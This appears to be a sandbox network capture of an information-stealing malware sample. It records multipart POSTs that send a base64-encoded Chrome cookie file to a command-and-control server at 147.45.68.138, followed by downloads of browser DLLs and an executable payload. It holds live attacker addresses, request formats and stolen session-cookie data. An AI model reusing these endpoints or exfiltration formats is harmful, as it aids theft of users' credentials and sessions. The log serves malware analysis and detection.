Sep 4, 2024 17:38:01.796756029 CEST	1236	IN	Data Raw: 00 e9 59 5e 1a 00 e9 0e 32 1a 00 e9 48 db 1d 00 e9 0d 4e 1c 00 e9 92 55 1c 00 e9 37 56 1d 00 e9 dd d9 17 00 e9 a9 33 1c 00 e9 c8 93 1e 00 e9 50 5d 1b 00 e9 ec b7 1e 00 e9 b9 e4 1d 00 e9 8f 5b 20 00 e9 4d 13 20 00 e9 23 18 1d 00 e9 7e 56 1b 00 e9 Data Ascii: Y^2HNU7V3P][ M #~Vvt5-gUEj &HXt8"B>V!SI\Yil
Sep 4, 2024 17:38:01.796771049 CEST	128	IN	Data Raw: e9 dd ff 1e 00 e9 e5 50 1e 00 e9 38 a4 1b 00 e9 89 1b 20 00 e9 da 4d 1c 00 e9 2e 39 1c 00 e9 0c e9 1c 00 e9 e5 d9 17 00 e9 21 27 1f 00 e9 86 eb 1e 00 e9 04 b5 1f 00 e9 71 36 03 00 e9 cc 1b 1a 00 e9 e4 19 1d 00 e9 42 f0 1f 00 e9 7f b6 1b 00 e9 d5 Data Ascii: P8 M.9!'q6B=T$Ao[6
Sep 4, 2024 17:38:01.802967072 CEST	1236	IN	Data Raw: 03 00 e9 e2 c6 1e 00 e9 f1 a7 00 00 e9 21 f1 1c 00 e9 e7 50 1b 00 e9 75 13 20 00 e9 7e fc 1f 00 e9 4c 44 1a 00 e9 c0 19 1b 00 e9 f0 4c 1c 00 e9 39 ab 17 00 e9 34 84 03 00 e9 2f 4b 03 00 e9 ad ea 1d 00 e9 12 87 1c 00 e9 60 da 17 00 e9 0c db 1a 00 Data Ascii: !Pu ~LDL94/K`<Jd_LbxW?p.f<J5>UBzmY" Jn/wM
Sep 4, 2024 17:38:01.802983046 CEST	1236	IN	Data Raw: 00 e9 63 9e 1d 00 e9 6e 0c 03 00 e9 b0 ed 1d 00 e9 86 84 1d 00 e9 b0 a3 1b 00 e9 9a 45 03 00 e9 e5 c4 00 00 e9 16 5a 1d 00 e9 8b 31 03 00 e9 10 0a 20 00 e9 84 79 1b 00 e9 d5 13 1c 00 e9 9d 18 1f 00 e9 1b 61 1e 00 e9 f4 ba 1e 00 e9 58 5c 03 00 e9 Data Ascii: cnEZ1 yaX\pESTSw F9vU1}-?"?&Y;i7JKU7i( 23N'I7
Sep 4, 2024 17:38:01.802999020 CEST	128	IN	Data Raw: e9 c3 f6 1d 00 e9 ab 7e 03 00 e9 06 7d 00 00 e9 ff d4 1c 00 e9 f8 3a 1a 00 e9 2e 46 1d 00 e9 72 64 00 00 e9 26 02 20 00 e9 8b ae 1b 00 e9 3c 7d 1c 00 e9 3e b3 1c 00 e9 8e 2f 1e 00 e9 86 3a 1c 00 e9 37 ea 1a 00 e9 ea 7d 03 00 e9 46 85 1e 00 e9 57 Data Ascii: ~}:.Frd& <}>/:7}FW<u_Ix{
Sep 4, 2024 17:38:01.809240103 CEST	1236	IN	Data Raw: 03 00 e9 2d c3 1b 00 e9 e9 99 17 00 e9 1f c4 1d 00 e9 cf ff 1e 00 e9 1f 1b 1f 00 e9 22 1f 1d 00 e9 60 f9 1a 00 e9 24 ae 1f 00 e9 12 99 1c 00 e9 95 9f 1a 00 e9 6c 67 00 00 e9 53 6d 1b 00 e9 53 45 1d 00 e9 b8 1c 1c 00 e9 2f 27 1c 00 e9 d9 42 1c 00 Data Ascii: -"`$lgSmSE/'BEc<t.GkC2MlW3a~bI2_
Sep 4, 2024 17:38:01.809259892 CEST	1236	IN	Data Raw: 00 e9 c8 40 1d 00 e9 46 8d 00 00 e9 87 9f 1f 00 e9 dc eb 1d 00 e9 45 fb 1d 00 e9 50 3e 1c 00 e9 4d 09 1a 00 e9 19 4e 1b 00 e9 23 88 1d 00 e9 60 68 1e 00 e9 8e ba 1a 00 e9 93 e9 1f 00 e9 11 b6 1e 00 e9 ea b6 1e 00 e9 64 5f 1a 00 e9 7d 2c 1c 00 e9 Data Ascii: @FEP>MN#`hd_},#X`-.$pR5]9iH<=6u*@BWo
Sep 4, 2024 17:38:04.002799988 CEST	1009	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF Host: 147.45.68.138 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 [TRUNCATED] Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="file_name"Q29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="file_data"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------IEBAAFCAFCBKFHJJJKKF--
Sep 4, 2024 17:38:05.187892914 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Sep 4, 2024 17:38:06.986690044 CEST	99	OUT	GET /freebl3.dll HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:07.173769951 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:07 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-a7550" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 4, 2024 17:38:07.631766081 CEST	99	OUT	GET /mozglue.dll HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:07.814483881 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:07 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-94750" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 4, 2024 17:38:08.492007971 CEST	100	OUT	GET /msvcp140.dll HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:08.674864054 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:08 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-6dde8" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 4, 2024 17:38:09.431505919 CEST	100	OUT	GET /softokn3.dll HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:09.614870071 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:09 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-3ef50" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 4, 2024 17:38:09.759388924 CEST	104	OUT	GET /vcruntime140.dll HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:10.260664940 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:09 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-13bf0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 4, 2024 17:38:10.298351049 CEST	96	OUT	GET /nss3.dll HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:10.486915112 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:10 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-1f3950" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 4, 2024 17:38:12.374628067 CEST	181	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAF Host: 147.45.68.138 Content-Length: 1025 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:13.485223055 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	53051	147.45.44.104	80

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:38:19.280072927 CEST	88	OUT	GET /prog/66d7077a2064d_l.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:38:20.118537903 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:19 GMT Content-Type: application/octet-stream Content-Length: 342568 Last-Modified: Tue, 03 Sep 2024 12:56:26 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d7077a-53a28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf~& @@ `$&W@(&`$ H.text `.rsrc@@@.reloc`@B`&H,`pN7nQ.de$[ABCU1#^56i%^Ea9[ctqZ;6z[^X'/VHW,w]~5"Ox2`b2X>=\l#xS,~,"z<cZ.m%}R?G*9Xs$FL@\{.J~\T@C:qnzlX3 k$Dq4
Sep 4, 2024 17:38:20.118558884 CEST	224	IN	Data Raw: bc 18 da 35 3f 16 c1 f3 19 f9 99 62 08 a2 1d 9e 5f 5f 63 cd 38 33 f5 c2 6a 14 cc c5 ae 8c d1 e2 2a 6c 1b 27 0e 98 5a b3 bf 7b 65 02 22 37 15 49 10 27 a4 d0 a0 e7 d1 14 9b 0c 6a f2 f9 1d 54 b0 01 3a ae 2f 84 4a a4 51 81 a6 d0 a7 54 41 07 4f ed a1 Data Ascii: 5?b__c83jl'Z{e"7I'jT:/JQTAO-Z-gZWyxEPc/o2>]DQJ2:0cT{)iDy@KObl#id8^;K38.^(%bSl~
Sep 4, 2024 17:38:20.118570089 CEST	1236	IN	Data Raw: 8c 60 4b 57 91 20 3a 31 87 e8 cc 75 26 83 17 ba ae 3c f5 bf 75 a4 ec 15 f7 77 40 96 21 cb a3 80 54 ef 6f cd b7 88 43 2a 6f e6 ea e0 40 5f 2f 88 b1 60 57 a9 9b e4 ba 78 42 d7 3f 29 ef e1 49 77 21 05 70 42 90 df fa 1d fa 76 27 65 4b a0 47 dd a5 c8 Data Ascii: `KW :1u&<uw@!ToCo@_/`WxB?)Iw!pBv'eKGFv:D#uVy5kY }lA,Tg_p0@t`eU2Rh^YOxv&ap8p}PD VsI"9eN?F"o(O
Sep 4, 2024 17:38:20.118581057 CEST	1236	IN	Data Raw: a5 5e 28 96 5f ff e1 b6 2e 5d 1c 28 24 14 b5 44 14 10 ae bf b6 4c 93 d7 42 ba e3 b9 72 4b 58 2c e3 72 25 ab 72 c8 de 05 ad d2 b5 97 9e 8c c9 ef 31 85 97 9e 6b 98 da f2 5f b9 3c cd f6 e5 24 30 21 b5 14 04 06 6c d3 75 08 ee 49 4a a6 d5 ae 8b b3 d9 Data Ascii: ^(_.]($DLBrKX,r%r1k_<$0!luIJ.QL^ns`?}_'fljSy(_8iPI.h1gztzj& .EI3,C"0JDPSoLeAJ9ZD!4y&J.Xa,(
Sep 4, 2024 17:38:20.118592978 CEST	1236	IN	Data Raw: d4 9a 59 f5 f8 d7 c4 73 a8 85 30 50 d0 ec 40 32 72 1f e3 ce 4a 7c bd e5 50 d7 6a e4 9e 57 e3 ad bb 86 e0 60 c0 ee 51 1c 85 79 55 8a 86 07 fe bf ac 21 14 f9 9a 31 cf ca f7 8b 03 46 e0 7d 2c 2d 54 cc 88 30 f0 31 2e a3 8e c3 6b 02 ec 64 78 58 45 31 Data Ascii: Ys0P@2rJ\|PjW`QyU!1F},-T01.kdxXE1'"..'15A"d7Fq\|5A], >!U>\|2-PDe)fw0D)az<E>F);pbg\9l8qlrCjlQHY7_
Sep 4, 2024 17:38:20.118603945 CEST	1236	IN	Data Raw: e8 33 00 18 40 b1 81 88 7d 10 9b cb b6 3e 9b ed 97 9f 91 ef 64 d8 a9 79 2d bc 47 3e 78 3e 4c e5 aa 06 26 99 ae f6 2d b7 1f 5a 30 3f 46 a3 2d 8e 6e 64 43 0f 37 88 1a 8c 9e fe f8 3d cc 24 00 bb 3e 03 b8 48 8e cf cb 52 36 cb bd 42 8c 9d d3 3e 8d 7e Data Ascii: 3@}>dy-G>x>L&-Z0?F-ndC7=$>HR6B>~q<,iBJxoz~z t0\+s;=-%uX=9L9DlxBE;=G?\dPAXm.Lnks*)dyYO\[J<\gd@{04,w-
Sep 4, 2024 17:38:20.118618011 CEST	1236	IN	Data Raw: 6d 99 11 4b 24 ef 19 45 16 3b d0 f9 f3 bc 7e 04 62 89 3a db 5b fb 1d 0a ed 04 f6 67 66 8c bd 53 42 d4 68 85 b1 8e 0b 4d fc 8e 48 64 ab 7c 27 57 c1 82 3c 32 f7 85 30 d1 7e ff a7 8a 04 1d 0f 52 00 c9 fd 5b 9b 6e ba 6c 37 e1 cc 45 67 07 e7 3a a9 17 Data Ascii: mK$E;~b:[gfSBhMHd\|'W<20~R[nl7Eg:f y\|,jaNKEW%egAzhD9Fkd)\[#7?\|9sUj-odlmPXE[obu@iT#@857>Y!Qb3m
Sep 4, 2024 17:38:20.118629932 CEST	1236	IN	Data Raw: 62 07 49 5c ad 72 50 e8 54 82 80 37 12 64 5a d8 d6 f1 e4 3c d4 c5 6d 73 c9 bd 4d a3 20 e5 56 21 fe 03 aa c1 6d 0a e7 3e 2d 98 46 d8 1f 0f 45 ed df d5 6f 72 04 2e 8b df 52 13 ee 14 45 4e 2d f2 f5 c7 38 3e 74 2a 1e be 8b 32 65 fe 6e 7c 18 bb 28 b0 Data Ascii: bI\rPT7dZ<msM V!m>-FEor.REN-8>t2en\|(hu&QqTpX\|\Z>M".g.?0v)oeTVu=ikv.dzWZJEwm(Z=g]1hh}~p`AGV3T
Sep 4, 2024 17:38:20.118642092 CEST	1236	IN	Data Raw: 13 d5 7a 4b 26 c9 98 d0 5a f8 c7 32 87 e3 2a f5 c6 df 9c 4a 02 87 ad 51 29 e4 51 1f 0e fe 9a 2f 59 9d 6f 48 89 be 3a b6 24 6f 9f c8 1e 17 b8 e1 bc 93 c7 55 c1 5f 4f 65 4e 54 55 60 bb c7 9c 16 cb 67 d2 8f b1 a2 2f b6 a3 4a 6e 82 9c 53 60 38 68 ab Data Ascii: zK&Z2*JQ)Q/YoH:$oU_OeNTU`g/JnS`8hq\n$$qcL)mep;s{5yH]-~?8Z4/`G2azYK3FOP`=T$xAW1H2R}m`.fN:SQ p
Sep 4, 2024 17:38:20.118655920 CEST	1000	IN	Data Raw: 89 d9 5a 5c 23 ff ad 2b 16 c5 d4 04 45 49 be 24 0d 37 70 c5 0e cb 3d c0 87 ed ab 56 a4 93 18 b8 1c 77 e9 a1 ed 83 9a 9d bd 5d 17 b7 4b bc 1d 11 17 2b 2f 1b 73 ae 97 e0 0e 52 2d d2 a8 2c fc 0a ff 64 0e b4 45 49 73 13 a4 ca c2 d2 9f 19 87 29 78 65 Data Ascii: Z\#+EI$7p=Vw]K+/sR-,dEIs)xeD%5Uv}7Dp9\r]CGg&D\|6SN^,MAgmg`aYMMPlp~`ZV1r,CHN)hg.a%Kn2<k3
